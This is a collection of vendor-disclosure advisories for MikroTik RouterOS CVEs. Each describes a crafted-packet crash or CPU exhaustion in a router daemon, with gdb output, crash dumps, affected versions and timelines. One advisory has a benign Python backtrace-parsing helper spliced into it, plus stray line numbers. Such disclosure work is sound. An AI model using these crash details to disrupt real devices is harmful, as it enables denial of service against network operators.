/advisory/MikroTik/CVE-2020-20221/images/cerm_high_cpu_load.png: https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/advisory/MikroTik/CVE-2020-20221/images/cerm_high_cpu_load.png

---

/advisory/MikroTik/CVE-2020-20222/README.md:

### CVE-2020-20222

#### Description

The `sniffer` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `sniffer` process due to a NULL pointer dereference.

Against stable `6.46.5`, the PoC resulted in the following crash, captured by `gdb`.

```shell
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
=> 0x8050e33:    or     ecx,DWORD PTR [eax+0xc]
   0x8050e36:    mov    edx,edi
   0x8050e38:    mov    eax,ebx
   0x8050e3a:    call   0x804ffbc
0x08050e33 in ?? ()
(gdb) i r
eax            0x0                 0
ecx            0xff0000            16711680
edx            0x8059678           134583928
ebx            0x7f85c090          2139472016
esp            0x7f85c080          0x7f85c080
ebp            0x7f85c0c8          0x7f85c0c8
esi            0x7f85c094          2139472020
edi            0x8057a24           134576676
eip            0x8050e33           0x8050e33
eflags         0x10206             [ PF IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
* 1    process 195       target:/nova/bin/sniffer
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: /nova/bin/sniffer
2020.06.19-16:36:18.33@0: --- signal=11 --------------------------------------------
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: eip=0x08050e33 eflags=0x00010206
2020.06.19-16:36:18.33@0: edi=0x08057a24 esi=0x7f85c094 ebp=0x7f85c0c8 esp=0x7f85c080
2020.06.19-16:36:18.33@0: eax=0x00000000 ebx=0x7f85c090 ecx=0x00ff0000 edx=0x08059678
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: maps:
2020.06.19-16:36:18.33@0: 08048000-08056000 r-xp 00000000 00:0c 1034 /nova/bin/sniffer
2020.06.19-16:36:18.33@0: 776ce000-77703000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.19-16:36:18.33@0: 77707000-77721000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.19-16:36:18.33@0: 77722000-77731000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.19-16:36:18.33@0: 77732000-7773a000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.19-16:36:18.33@0: 7773b000-77787000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.19-16:36:18.33@0: 7778d000-77794000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: stack: 0x7f85d000 - 0x7f85c080
2020.06.19-16:36:18.33@0: 2c 08 07 08 04 00 fe 08 fe 00 00 00 20 ad 05 08 00 0c 07 08 a0 0b 07 08 af 0b 07 08 04 7a 05 08
2020.06.19-16:36:18.33@0: 08 00 00 00 24 7a 05 08 ff 00 00 00 00 00 00 00 08 c2 85 7f e4 7a 78 77 d8 c0 85 7f e4 7a 78 77
2020.06.19-16:36:18.34@0:
2020.06.19-16:36:18.34@0: code: 0x8050e33
2020.06.19-16:36:18.34@0: 0b 48 0c 89 fa 89 d8 e8 7d f1 ff ff 50 50 53 56
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.6`, and the latest stable version, `6.48.2`, still appears to be affected.

#### Timeline

+ 2020/01/06 - reported the vulnerability to the vendor
+ 2020/01/07 - vendor confirmed the vulnerability and said it would work on a fix
+ 2021/05/04 - CVE was assigned

---

/advisory/MikroTik/CVE-2020-20225/README.md:

### CVE-2020-20225

#### Description

The `user` process suffers from an assertion failure vulnerability: there is a reachable assertion in the `user` process. By sending a crafted packet, an authenticated remote user can crash the `user` process by triggering this assertion.

Against stable `6.46.5`, the PoC resulted in the following crash, captured by `gdb`.

```shell
(gdb) c
Continuing.

Program received signal SIGABRT, Aborted.
=> 0x7765a55b:    pop    ebx
   0x7765a55c:    cmp    eax,0xfffff000
   0x7765a561:    jbe    0x7765a571
   0x7765a563:    mov    edx,DWORD PTR [ebx-0x34]
0x7765a55b in raise () from target:/lib/libc.so.0
(gdb) i r
eax            0x0                 0
ecx            0xb4                180
edx            0x6                 6
ebx            0xb4                180
esp            0x7fee3788          0x7fee3788
ebp            0x7fee3790          0x7fee3790
esi            0x77662200          2003182080
edi            0xfe0001            16646145
eip            0x7765a55b          0x7765a55b
eflags         0x246               [ PF ZF IF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
* 1    process 180       target:/nova/bin/user
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: /nova/bin/user
2020.06.04-17:56:52.31@0: --- signal=6 --------------------------------------------
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x00000246
2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 ebp=0x7fee3790 esp=0x7fee3788
2020.06.04-17:56:52.31@0: eax=0x00000000 ebx=0x000000b4 ecx=0x000000b4 edx=0x00000006
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: maps:
2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp 00000000 00:0c 1002 /nova/bin/user
2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-17:56:52.31@0: 77680000-7768f000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.04-17:56:52.31@0: 77690000-776ad000 r-xp 00000000 00:0c 947 /lib/libucrypto.so
2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp 00000000 00:0c 951 /lib/liburadius.so
2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp 00000000 00:0c 948 /lib/libuxml++.so
2020.06.04-17:56:52.31@0: 776c2000-7770e000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.04-17:56:52.31@0: 77714000-7771b000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: stack: 0x7fee4000 - 0x7fee3788
2020.06.04-17:56:52.31@0: 00 20 66 77 00 20 66 77 c8 37 ee 7f 77 60 65 77 06 00 00 00 00 22 66 77 20 00 00 00 00 00 00 00
2020.06.04-17:56:52.31@0: 15 00 00 00 28 38 ee 7f c4 37 ee 7f e4 ea 70 77 01 00 00 00 e4 ea 70 77 15 00 00 00 01 00 fe 00
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: code: 0x7765a55b
2020.06.04-17:56:52.31@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`.

#### Timeline

+ 2020/02/15 - reported the vulnerability to the vendor
+ 2020/06/02 - vendor fixed it in stable `6.47`
+ 2021/05/04 - CVE was assigned

---

/advisory/MikroTik/CVE-2020-20227/README.md:

### CVE-2020-20227

#### Description

The `diskd` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `diskd` process due to an invalid memory access.

Against stable `6.47`, the PoC resulted in the following crash, captured by `gdb`.

```shell
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
=> 0x7775a1e3 <_ZN6string6assignERKS_+21>:    mov    eax,DWORD PTR [eax]
   0x7775a1e5 <_ZN6string6assignERKS_+23>:    mov    edx,DWORD PTR [eax]
   0x7775a1e7 <_ZN6string6assignERKS_+25>:    add    edx,eax
   0x7775a1e9 <_ZN6string6assignERKS_+27>:    add    edx,0x4
0x7775a1e3 in string::assign(string const&) () from target:/lib/libuc++.so
(gdb) i r
eax            0xa                 10
ecx            0x8054600           134563328
edx            0x8056e18           134573592
ebx            0x777624ec          2004231404
esp            0x7f9dceac          0x7f9dceac
ebp            0x7f9dceb8          0x7f9dceb8
esi            0xa                 10
edi            0x7f9dd024          2141048868
eip            0x7775a1e3          0x7775a1e3
eflags         0x10202             [ IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
* 1    process 119       target:/nova/bin/diskd
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: /nova/bin/diskd
2020.06.05-15:00:38.33@0: --- signal=11 --------------------------------------------
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: eip=0x7775a1e3 eflags=0x00010202
2020.06.05-15:00:38.33@0: edi=0x7f9dd024 esi=0x0000000a ebp=0x7f9dceb8 esp=0x7f9dceac
2020.06.05-15:00:38.33@0: eax=0x0000000a ebx=0x777624ec ecx=0x08054600 edx=0x08056e18
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: maps:
2020.06.05-15:00:38.33@0: 08048000-08052000 r-xp 00000000 00:0c 1049 /nova/bin/diskd
2020.06.05-15:00:38.33@0: 776ff000-77734000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so
2020.06.05-15:00:38.33@0: 77738000-77752000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1
2020.06.05-15:00:38.33@0: 77753000-77762000 r-xp 00000000 00:0c 945 /lib/libuc++.so
2020.06.05-15:00:38.33@0: 77763000-7776b000 r-xp 00000000 00:0c 951 /lib/libubox.so
2020.06.05-15:00:38.33@0: 7776c000-777b8000 r-xp 00000000 00:0c 947 /lib/libumsg.so
2020.06.05-15:00:38.33@0: 777be000-777c5000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: stack: 0x7f9de000 - 0x7f9dceac
2020.06.05-15:00:38.33@0: f4 8a 7b 77 0a 00 00 00 f4 8a 7b 77 e8 ce 9d 7f 92 be 78 77 f8 45 05 08 0a 00 00 00 18 6e 05 08
2020.06.05-15:00:38.33@0: 18 6e 05 08 e4 ce 9d 7f 24 d0 9d 7f 7c 18 76 77 24 d0 9d 7f 18 69 05 08 40 cf 9d 7f a8 cf 9d 7f
2020.06.05-15:00:38.34@0:
2020.06.05-15:00:38.34@0: code: 0x7775a1e3
2020.06.05-15:00:38.34@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75
```

#### Affected Version

This vulnerability was initially found in stable `6.47`, and was fixed at least as of stable `6.48.1`.

#### Timeline

+ 2020/08/04 - reported the vulnerability to the vendor
+ 2020/08/05 - vendor requested more information to recompile the provided PoC source file
+ 2020/08/05 - provided the cmake file to the vendor
+ 2020/08/06 - vendor reproduced and confirmed the vulnerability
+ 2021/03/01 - re-tested against stable `6.48.1`: fixed in this version (no response from the vendor indicating whether this vulnerability had been fixed, or in which version)
+ 2021/05/04 - CVE was assigned

---

/advisory/MikroTik/CVE-2020-20230/README.md:

### CVE-2020-20230

#### Description

The `sshd` process suffers from an uncontrolled resource consumption vulnerability. By sending a crafted packet, an authenticated remote user can cause high CPU load, which may make the device respond slowly or stop responding altogether.

When testing the proof of concept on an x86 RouterOS VM, this vulnerability consumes all the memory and eventually causes the whole system to reboot.

Against stable `6.46.3`, the PoC resulted in high CPU load on the device.

![sshd_high_cpu_load](./images/sshd_high_cpu_load.png)

#### Affected Version

This vulnerability was initially found in stable `6.46.3`, and was fixed in stable `6.47`.

#### Timeline

+ 2020/04/08 - reported the vulnerability to the vendor
+ 2020/04/09 - vendor reproduced and confirmed the vulnerability
+ 2020/04/23 - vendor responded that "it has been fixed and will be added to the next public Beta release"
+ 2021/05/04 - CVE was assigned

---

/advisory/MikroTik/CVE-2020-20230/images/sshd_high_cpu_load.png: https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/advisory/MikroTik/CVE-2020-20230/images/sshd_high_cpu_load.png

---

/advisory/MikroTik/CVE-2020-20231/README.md:

### CVE-2020-20231

#### Description

The `detnet` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `detnet` process due to a NULL pointer dereference.

Against stable `6.46.5`, the PoC resulted in the following crash dump.

```shell
# cat /rw/logs/backtrace.log
2020.06.22-16:22:09.85@0:
2020.06.22-16:22:09.85@0:
2020.06.22-16:22:09.85@0: /nova/bin/detnet
2020.06.22-16:22:09.85@0: --- signal=11 --------------------------------------------
2020.06.22-16:22:09.85@0:
2020.06.22-16:22:09.85@0: eip=0x776d86da eflags=0x00010216
2020.06.22-16:22:09.85@0: edi=0x7fe6cea4 esi=0x7fe6ce0c ebp=0x7fe6cda8 esp=0x7fe6cda0
2020.06.22-16:22:09.85@0: eax=0x00000020 ebx=0x77707ae4 ecx=0x0805d898 edx=0x7fe6cddc
2020.06.22-16:22:09.85@0:
2020.06.22-16:22:09.85@0: maps:
2020.06.22-16:22:09.85@0: 08048000-08058000 r-xp 00000000 00:0c 1062 /nova/bin/detnet
2020.06.22-16:22:09.85@0: 77630000-77665000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.22-16:22:09.85@0: 77669000-77683000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.22-16:22:09.85@0: 77684000-77693000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.22-16:22:09.85@0: 77694000-776b1000 r-xp 00000000 00:0c 947 /lib/libucrypto.so
2020.06.22-16:22:09.85@0: 776b2000-776ba000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.22-16:22:09.85@0: 776bb000-77707000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.22-16:22:09.85@0: 7770d000-77714000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.22-16:22:09.85@0:
2020.06.22-16:22:09.85@0: stack: 0x7fe6d000 - 0x7fe6cda0
2020.06.22-16:22:09.85@0: 20 00 00 00 dc cd e6 7f f8 cd e6 7f 32 ff 04 08 dc cd e6 7f 20 00 00 00 00 00 00 00 64 a9 6d 77
2020.06.22-16:22:09.85@0: 9c d5 05 08 98 d8 05 08 e8 cd e6 7f 44 ad 6d 77 a4 ce e6 7f 02 00 00 08 f8 cd e6 7f 1c ad 6d 77
2020.06.22-16:22:09.85@0:
2020.06.22-16:22:09.85@0: code: 0x776d86da
2020.06.22-16:22:09.85@0: 8b 00 89 02 3b 83 34 ff ff ff 74 03 ff 40 24 80
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.6`, and the latest stable version, `6.48.3`, still appears to be affected.

#### Timeline

+ 2020/04/20 - reported the vulnerability to the vendor
+ 2020/04/23 - vendor confirmed the vulnerability and said it would work on a fix
+ 2021/05/04 - CVE was assigned

---

/advisory/MikroTik/CVE-2020-20236/README.md:

### CVE-2020-20236

#### Description

The `sniffer` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `sniffer` process due to an invalid memory access.

Against stable `6.46.5`, the PoC resulted in the following crash dump.

```shell
# cat /rw/logs/backtrace.log
2020.06.19-16:58:33.42@0:
2020.06.19-16:58:33.42@0:
2020.06.19-16:58:33.42@0: /nova/bin/sniffer
2020.06.19-16:58:33.42@0: --- signal=11 --------------------------------------------
2020.06.19-16:58:33.42@0:
2020.06.19-16:58:33.42@0: eip=0x08050dac eflags=0x00010202
2020.06.19-16:58:33.42@0: edi=0x08057a24 esi=0x00000001 ebp=0x7f8df428 esp=0x7f8df3e0
2020.06.19-16:58:33.42@0: eax=0x08073714 ebx=0x08073710 ecx=0x08073704 edx=0x08073714
2020.06.19-16:58:33.42@0:
2020.06.19-16:58:33.42@0: maps:
2020.06.19-16:58:33.42@0: 08048000-08056000 r-xp 00000000 00:0c 1034 /nova/bin/sniffer
2020.06.19-16:58:33.42@0: 77730000-77765000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.19-16:58:33.42@0: 77769000-77783000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.19-16:58:33.42@0: 77784000-77793000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.19-16:58:33.42@0: 77794000-7779c000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.19-16:58:33.42@0: 7779d000-777e9000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.19-16:58:33.43@0: 777ef000-777f6000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.19-16:58:33.43@0:
2020.06.19-16:58:33.43@0: stack: 0x7f8e0000 - 0x7f8df3e0
2020.06.19-16:58:33.43@0: 3c ab 05 08 04 00 fe 08 e0 0f 00 00 14 37 07 08 24 7a 05 08 00 00 00 00 18 f4 8d 7f 04 7a 05 08
2020.06.19-16:58:33.43@0: 08 00 00 00 24 7a 05 08 04 00 00 00 00 00 00 00 70 4a 7a 77 e4 9a 7e 77 38 f4 8d 7f e4 9a 7e 77
2020.06.19-16:58:33.43@0:
2020.06.19-16:58:33.43@0: code: 0x8050dac
2020.06.19-16:58:33.43@0: 8b 43 04 83 e0 fc 85 c0 74 1c 8b 4b 14 39 34 08
```

#### Affected Version

This vulnerability was initially found in stable `6.46.3`, and the latest stable version, `6.48.2`, still appears to be affected.

#### Timeline

+ 2020/02/26 - reported the vulnerability to the vendor
+ 2020/02/27 - vendor confirmed the vulnerability and said it would work on a fix
+ 2021/05/04 - CVE was assigned

---

/advisory/MikroTik/CVE-2020-20237/README.md:

### CVE-2020-20237

#### Description

The `sniffer` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `sniffer` process due to an invalid memory access.

Against stable `6.46.5`, the PoC resulted in the following crash dump.
8 | 9 | ```shell 10 | # cat /rw/logs/backtrace.log 11 | 2020.06.19-17:58:43.98@0: 12 | 2020.06.19-17:58:43.98@0: 13 | 2020.06.19-17:58:43.98@0: /nova/bin/sniffer 14 | 2020.06.19-17:58:43.98@0: --- signal=11 -------------------------------------------- 15 | 2020.06.19-17:58:43.98@0: 16 | 2020.06.19-17:58:43.98@0: eip=0x77712055 eflags=0x00010202 17 | 2020.06.19-17:58:43.98@0: edi=0x77720f34 esi=0x77721015 ebp=0x7ff96b38 esp=0x7ff96af8 18 | 2020.06.19-17:58:43.98@0: eax=0x77721054 ebx=0x7771f000 ecx=0x77721034 edx=0x77721014 19 | 2020.06.19-17:58:43.98@0: 20 | 2020.06.19-17:58:43.98@0: maps: 21 | 2020.06.19-17:58:43.98@0: 08048000-08056000 r-xp 00000000 00:0c 1034 /nova/bin/sniffer 22 | 2020.06.19-17:58:43.98@0: 776e9000-7771e000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 23 | 2020.06.19-17:58:43.98@0: 77722000-7773c000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 24 | 2020.06.19-17:58:43.98@0: 7773d000-7774c000 r-xp 00000000 00:0c 944 /lib/libuc++.so 25 | 2020.06.19-17:58:43.98@0: 7774d000-77755000 r-xp 00000000 00:0c 950 /lib/libubox.so 26 | 2020.06.19-17:58:43.98@0: 77756000-777a2000 r-xp 00000000 00:0c 946 /lib/libumsg.so 27 | 2020.06.19-17:58:43.98@0: 777a8000-777af000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 28 | 2020.06.19-17:58:43.98@0: 29 | 2020.06.19-17:58:43.98@0: stack: 0x7ff97000 - 0x7ff96af8 30 | 2020.06.19-17:58:43.98@0: 00 f0 71 77 00 0f 72 77 30 00 00 00 00 00 00 00 38 b2 05 08 34 0f 72 77 04 00 00 00 00 0f 72 77 31 | 2020.06.19-17:58:43.98@0: 20 00 00 00 1b 7b 71 77 e8 f1 71 77 98 00 00 00 01 00 00 00 ec c4 74 77 74 a1 05 08 f8 6b f9 7f 32 | 2020.06.19-17:58:43.98@0: 33 | 2020.06.19-17:58:43.98@0: code: 0x77712055 34 | 2020.06.19-17:58:43.98@0: 89 14 10 eb bc 8b 93 a4 ff ff ff 8b 7d e0 8b 42 35 | ``` 36 | 37 | Interestingly, the same poc resulted in another different crash dump(`SIGABRT`) against stable `6.48.2`. 
38 | 39 | ```shell 40 | # cat /rw/logs/backtrace.log 41 | 2021.05.07-16:02:37.25@0: 42 | 2021.05.07-16:02:37.25@0: 43 | 2021.05.07-16:02:37.25@0: /nova/bin/sniffer 44 | 2021.05.07-16:02:37.25@0: --- signal=6 -------------------------------------------- 45 | 2021.05.07-16:02:37.25@0: 46 | 2021.05.07-16:02:37.25@0: eip=0x776f255b eflags=0x00000246 47 | 2021.05.07-16:02:37.25@0: edi=0x0805aca8 esi=0x776fa200 ebp=0x7f97def8 esp=0x7f97def0 48 | 2021.05.07-16:02:37.25@0: eax=0x00000000 ebx=0x000000b6 ecx=0x000000b6 edx=0x00000006 49 | 2021.05.07-16:02:37.25@0: 50 | 2021.05.07-16:02:37.25@0: maps: 51 | 2021.05.07-16:02:37.25@0: 08048000-08056000 r-xp 00000000 00:0c 1036 /nova/bin/sniffer 52 | 2021.05.07-16:02:37.25@0: 776c4000-776f9000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so 53 | 2021.05.07-16:02:37.25@0: 776fd000-77717000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1 54 | 2021.05.07-16:02:37.25@0: 77718000-77727000 r-xp 00000000 00:0c 945 /lib/libuc++.so 55 | 2021.05.07-16:02:37.25@0: 77728000-77730000 r-xp 00000000 00:0c 951 /lib/libubox.so 56 | 2021.05.07-16:02:37.25@0: 77731000-7777d000 r-xp 00000000 00:0c 947 /lib/libumsg.so 57 | 2021.05.07-16:02:37.25@0: 77783000-7778a000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 58 | 2021.05.07-16:02:37.25@0: 59 | 2021.05.07-16:02:37.25@0: stack: 0x7f97f000 - 0x7f97def0 60 | 2021.05.07-16:02:37.25@0: 00 a0 6f 77 00 a0 6f 77 30 df 97 7f 77 e0 6e 77 06 00 00 00 00 a2 6f 77 20 00 00 00 00 00 00 00 61 | 2021.05.07-16:02:37.25@0: 26 2b 6f 77 00 a0 6f 77 28 df 97 7f 21 2c 6f 77 e8 a1 6f 77 00 a0 6f 77 00 bf 6f 77 a8 ac 05 08 62 | 2021.05.07-16:02:37.25@0: 63 | 2021.05.07-16:02:37.25@0: code: 0x776f255b 64 | 2021.05.07-16:02:37.25@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8 65 | ``` 66 | 67 | #### Affected Version 68 | 69 | This vulnerability was initially found in stable `6.46.3`, and it seems that the latest stable version `6.48.2` suffers from an assertion failure vulnerability when running the same poc. 
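All of the dumps in these advisories share the `/rw/logs/backtrace.log` layout (binary path, `--- signal=N`, register lines, a `maps:` table, a `stack:` hex dump and a `code:` hex dump). The triage helper below is an added example, not code from the advisories or from RouterOS: it parses that layout, reports which mapped module `eip` faulted in and at what offset, and scans the dumped stack for dwords that point into mapped code (candidate return addresses). It assumes the layout is exactly as shown above and uses trimmed copies of the two `sniffer` dumps as constructed input.

```python
"""Triage helper for RouterOS /rw/logs/backtrace.log records (added example, not RouterOS code)."""
import re
from typing import List, Optional, Tuple

# Every record line carries a "YYYY.MM.DD-hh:mm:ss.cc@N: " prefix; strip it first.
_PREFIX = re.compile(r"^\d{4}\.\d{2}\.\d{2}-\d{2}:\d{2}:\d{2}\.\d{2}@\d+:\s?")
_REG = re.compile(r"(e[a-d]x|e[sd]i|e[bs]p|eip|eflags)=0x([0-9a-fA-F]+)")
# Maps row, e.g. "08048000-08056000 r-xp 00000000 00:0c 1034 /nova/bin/sniffer"
_MAP = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+\S+\s+\S+\s+\d+\s+(\S+)$")
# Constructed input: the two sniffer dumps above (CVE-2020-20236, CVE-2020-20237), trimmed.
SNIFFER_SEGV = """\
2020.06.19-16:58:33.42@0: /nova/bin/sniffer
2020.06.19-16:58:33.42@0: --- signal=11 --------------------------------------------
2020.06.19-16:58:33.42@0: eip=0x08050dac eflags=0x00010202
2020.06.19-16:58:33.42@0: edi=0x08057a24 esi=0x00000001 ebp=0x7f8df428 esp=0x7f8df3e0
2020.06.19-16:58:33.42@0: eax=0x08073714 ebx=0x08073710 ecx=0x08073704 edx=0x08073714
2020.06.19-16:58:33.42@0: maps:
2020.06.19-16:58:33.42@0: 08048000-08056000 r-xp 00000000 00:0c 1034 /nova/bin/sniffer
2020.06.19-16:58:33.42@0: 77730000-77765000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.19-16:58:33.42@0: 7779d000-777e9000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.19-16:58:33.43@0: 777ef000-777f6000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.19-16:58:33.43@0: stack: 0x7f8e0000 - 0x7f8df3e0
2020.06.19-16:58:33.43@0: 3c ab 05 08 04 00 fe 08 e0 0f 00 00 14 37 07 08 24 7a 05 08 00 00 00 00 18 f4 8d 7f 04 7a 05 08
2020.06.19-16:58:33.43@0: 08 00 00 00 24 7a 05 08 04 00 00 00 00 00 00 00 70 4a 7a 77 e4 9a 7e 77 38 f4 8d 7f e4 9a 7e 77
2020.06.19-16:58:33.43@0: code: 0x8050dac
2020.06.19-16:58:33.43@0: 8b 43 04 83 e0 fc 85 c0 74 1c 8b 4b 14 39 34 08
"""
SNIFFER_LIBC = """\
2020.06.19-17:58:43.98@0: /nova/bin/sniffer
2020.06.19-17:58:43.98@0: --- signal=11 --------------------------------------------
2020.06.19-17:58:43.98@0: eip=0x77712055 eflags=0x00010202
2020.06.19-17:58:43.98@0: maps:
2020.06.19-17:58:43.98@0: 08048000-08056000 r-xp 00000000 00:0c 1034 /nova/bin/sniffer
2020.06.19-17:58:43.98@0: 776e9000-7771e000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.19-17:58:43.98@0: code: 0x77712055
2020.06.19-17:58:43.98@0: 89 14 10 eb bc 8b 93 a4 ff ff ff 8b 7d e0 8b 42
"""


def parse_backtrace(text: str) -> dict:
    """Split one record into binary, signal, registers, maps, stack bytes and code bytes."""
    rec = {"binary": "", "signal": None, "regs": {}, "maps": [],
           "stack": bytearray(), "code": bytearray()}
    section = None
    for raw in text.splitlines():
        line = _PREFIX.sub("", raw).strip()
        if not line:
            continue
        if line.startswith("---"):                  # "--- signal=11 ----..."
            m = re.search(r"signal=(\d+)", line)
            rec["signal"] = int(m.group(1)) if m else None
        elif line.startswith("/") and not rec["binary"]:
            rec["binary"] = line                    # crashing executable
        elif line.split(":")[0] in ("maps", "stack", "code"):
            section = line.split(":")[0]            # section header
        elif "=0x" in line:
            for name, val in _REG.findall(line):
                rec["regs"][name] = int(val, 16)
        elif section == "maps":
            m = _MAP.match(line)
            if m:
                rec["maps"].append((int(m.group(1), 16), int(m.group(2), 16),
                                    m.group(3), m.group(4)))
        elif section in ("stack", "code"):
            rec[section].extend(bytes.fromhex(line))  # space-separated hex bytes
    return rec


def locate(addr: int, maps: list) -> Optional[Tuple[str, int]]:
    """Return (module path, offset into that mapping) for addr, or None if unmapped."""
    for start, end, _perms, path in maps:
        if start <= addr < end:
            return path, addr - start
    return None


def stack_pointers(rec: dict) -> List[Tuple[int, str, int]]:
    """Read the dumped stack as little-endian dwords and keep those that land in a
    mapped module: candidate return addresses for reconstructing the call chain."""
    hits = []
    for i in range(0, len(rec["stack"]) - 3, 4):
        val = int.from_bytes(rec["stack"][i:i + 4], "little")
        hit = locate(val, rec["maps"])
        if hit:
            hits.append((val, hit[0], hit[1]))
    return hits


def triage(text: str) -> dict:
    """Report where eip faulted; module is None when eip lies outside every r-xp mapping."""
    rec = parse_backtrace(text)
    eip = rec["regs"].get("eip")
    hit = locate(eip, rec["maps"]) if eip is not None else None
    return {"binary": rec["binary"], "signal": rec["signal"], "eip": eip,
            "module": hit[0] if hit else None, "offset": hit[1] if hit else None,
            "code": bytes(rec["code"]), "frames": stack_pointers(rec)}


if __name__ == "__main__":
    for cve, dump in (("CVE-2020-20236", SNIFFER_SEGV), ("CVE-2020-20237", SNIFFER_LIBC)):
        t = triage(dump)
        where = f"{t['module']}+0x{t['offset']:x}" if t["module"] else "unmapped"
        print(f"{cve}: {t['binary']} signal={t['signal']} eip=0x{t['eip']:08x} -> {where}")
```

A fault inside the main binary (CVE-2020-20236) points at the process's own parsing code, while a fault inside `libuClibc` (CVE-2020-20237) usually means corrupted arguments handed to a library routine; the module and offset are what you feed to a disassembler of the matching RouterOS build.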

#### Timeline

+ 2020/02/26 - reported the vulnerability to the vendor
+ 2020/02/27 - the vendor confirmed the vulnerability and will work on a fix
+ 2021/05/04 - CVE was assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20245/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20245

